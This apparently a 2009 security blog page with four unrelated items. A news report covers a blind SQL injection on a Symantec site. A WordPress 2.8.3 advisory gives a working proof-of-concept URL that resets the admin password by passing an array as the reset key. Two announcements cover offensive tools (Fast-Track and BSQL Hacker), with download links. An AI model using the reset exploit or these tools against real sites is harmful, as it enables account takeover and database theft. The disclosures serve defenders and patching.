Symantec Exposed Passwords, Serials – SQL Injection, Full Database Access

A self-proclaimed grey-hat hacker has located a critical SQL injection vulnerability in a website belonging to security giant Symantec. The flaw can be leveraged to extract a wealth of information from the database including customer and admin login credentials, product serial numbers, and possibly credit card information.

The flaw was found by a Romanian hacker going by the online handle of Unu, according to whom an insecure parameter of a script from the pcd.symantec.com website, allows for a Blind SQL Injection (SQLi) attack to be performed. In such an attack, the hacker obtains read and/or write permission to the underlying database of the vulnerable website.

The content of the pcd.symantec.com website is written in Japanese, but from what we could determine, it serves a product called Norton PC Doctor. The Web server appears to be running Windows Server 2000 as operating system, Microsoft IIS 6.0 with ASP support and Microsoft SQL Server 2000 as database back-end.

From the screen shots released by Unu there are many potentially interesting databases, but the one he chose to look at is called “symantecstore.” One of the tables in this database is named “PaymentInformationInfo” and contains columns such as BillingAddress, CardExpirationMonth, CardExpirationYear, CardNumber, CardType, CcIssueCode, CustomerEmail, CustomerFirstName, CustomerLastName or SecurityIndicator.

Source: Unu’s Blog

Topic: WordPress <= 2.8.3 Remote admin reset password
Credit: Laurent Gaffié [Laurent.gaffie(at)gmail.com]
Date: 11.08.2009
Proof Of Concept:

The way WordPress handle a password reset looks like this:
You submit your email adress or username via this form
/wp-login.php?action=lostpassword ;
Wordpress send you a reset confirmation like that via email:

Someone has asked to reset the password for the following site and username.

http://DOMAIN_NAME.TLD/wordpress

Username: admin
To reset your password visit the following address:

http://domain_name.tld/wp-login.php?action=rp&key[]=

You click on the link, and then WordPress reset your admin password, and sends you over another email with your new credentials.
Let’s see how it works:

wp-login.php:
…[snip]….
line 186:
function reset_password($key) {
global $wpdb;

$key = preg_replace(‘/[^a-z0-9]/i’, ”, $key);

if ( empty( $key ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));

$user = $wpdb->get_row($wpdb->prepare(“SELECT * FROM $wpdb->users
WHERE
user_activation_key = %s”, $key));
if ( empty( $user ) )
return new WP_Error(‘invalid_key’, __(‘Invalid key’));
…[snip]….
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : ‘login’;
$errors = new WP_Error();

if ( isset($_GET['key']) )
$action = ‘resetpass’;

// validate action so as to default to the login screen
if ( !in_array($action, array(‘logout’, ‘lostpassword’,
‘retrievepassword’,
‘resetpass’, ‘rp’, ‘register’, ‘login’)) && false ===
has_filter(‘login_form_’ . $action) )
$action = ‘login’;
…[snip]….

line 370:

break;

case ‘resetpass’ :
case ‘rp’ :
$errors = reset_password($_GET['key']);

if ( ! is_wp_error($errors) ) {
wp_redirect(‘wp-login.php?checkemail=newpass’);
exit();
}

wp_redirect(‘wp-login.php?action=lostpassword&error=invalidkey’);
exit();

break;
…[snip ]…

You can abuse the password reset function, and bypass the first step and then reset the admin password by submitting an array to the $key variable.

Business Impact: An attacker could exploit this vulnerability to reset the admin account of any wordpress/wordpress-mu <= 2.8.3

Solution: WordPress has fixed this problem last night and has been testing the fixes and looking for other problems since then. Version 2.8.4 which fixes all known problems is now available for download and is highly recommended for all users of WordPress.

Automated penetration suite for penetration testers.

Author: David Kennedy, Partner, Practice Lead
Release: February 7, 2009 @ ShmooCon by SecureState

For those of you new to Fast-Track, Fast-Track is a python based open-source project aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Fast-Track was originally conceived when David Kennedy was on a penetration test and found that there was generally a lack of tools or automation in certain attacks that were normally extremely advanced and time consuming. In an effort to reproduce some of David’s advanced attacks and propagate it down to the team at SecureState, David ended up writing Fast-Track for the public. Many of the issues Fast-Track exploits are due to improper sanitizing of client-side data within web applications, patch management, or lack of hardening techniques. All of these are relatively simple to fix if you know what to look for, but as penetration testers are extremely common findings for us. Fast-Track arms the penetration tester with advanced attacks that in most cases have never been performed before. Sit back relax, crank open a can of jolt cola and enjoy the ride.

Tested On:
Linux: Slackware, Debian, Ubuntu, Back|Track 3, Back|Track 4, Gentoo, FreeBSD, OpenBSD, OSX, RedHat

Dependencies: Metasploit 3, SQLite, PYMSSQL, FreeTDS, Pexpect, ClientForms, Beautiful Soup, and Psycho.

Installation Instructions: When extracting the tarball, run the setup.py file by executing python setup.py install, this will install the needed dependencies MINUS SQLite and Metasploit 3, you should specify the metasploit path or it will default to the BackTrack 3 installation menu. Once the installation is completed, Fast-Track should be fully functional.

Download :
http://www.securestate.com/files/fasttrack/fasttrack.tgz

BSQL Hacker is an automated SQL Injection Framework / Tool designed to exploit SQL injection vulnerabilities in virtually any database.

It ships with Automated Attack modules which allows the dumping of whole databases for the following DBMS:
* MS-SQL Server
* ORACLE
* MySQL (experimental)

Attack Templates for :
* MS Access
* MySQL
* ORACLE
* PostgreSQL
* MS-SQL Server

Also you can write your own attack template for any other database as well (see the manual for details). New attack templates and exploits for specific web application SQL Injections).

It supports :
* Blind SQL Injection (Boolean Injection)
* Full Blind SQL Injection (Time Based)
* Deep Blind SQL Injection (a new way to exploit BSQLIs)
* Error Based SQL Injection

It allows metasploit alike exploit repository to share and update exploits and attack temlpates.

Download BSQL Hacker :
http://labs.portcullis.co.uk/download/BSQLHackerSetup-0907.exe

More Info :
http://labs.portcullis.co.uk/application/bsql-hacker/